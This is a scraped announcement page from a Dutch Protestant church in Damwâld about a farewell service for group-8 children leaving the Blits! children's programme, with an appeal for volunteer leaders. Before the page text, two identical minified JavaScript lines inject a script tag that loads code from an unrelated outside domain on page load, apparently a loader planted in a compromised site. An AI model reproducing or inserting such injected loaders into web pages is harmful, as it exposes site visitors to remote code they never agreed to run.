;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); BLITS ! ... afscheid groep 8 op 16 juli ... iedereen van harte welkom! - PKN Damwâld

BLITS ! … afscheid groep 8 op 16 juli … iedereen van harte welkom!

Gepubliceerd op: vrijdag 7 juli

Zondagmorgen 16 juli staat in het teken van afscheid nemen van Blits! Door de kinderen van groep 8. Volgend seizoen zijn ze dan welkom bij Tienerkerk. Deze dienst is samen met deze kinderen voorbereid. Het beloofd dan ook een leuke en gezellige dienst te worden. Hierbij zijn alle ouders/ verzorgers, pakes en beppes, broers/ zussen en andere belangstellenden uitgenodigd om deze dienst bij te wonen.

Na de zomervakantie starten we op zondagmorgen 17 september weer met Blits! Wel zijn we nog steeds naarstig op zoek naar leiding (1 x per maand) en een mentor. Zodat onze kinderen ook de komende jaren naar Blits! kunnen gaan. Geef je daarom snel op via onderstaande gegevens. Wil je meer informatie over de invulling van beide vacatures. Neem dan vrijblijvend contact op met Susan van der Ploeg.

Mentor Blits! (06-15503257 of via mail: blitsdamwald@gmail.com)

Namens het hele Blits!-team wensen we u en jou een fijne vakantie en hopen we jullie na de zomer gezond en wel weer te ontmoeten!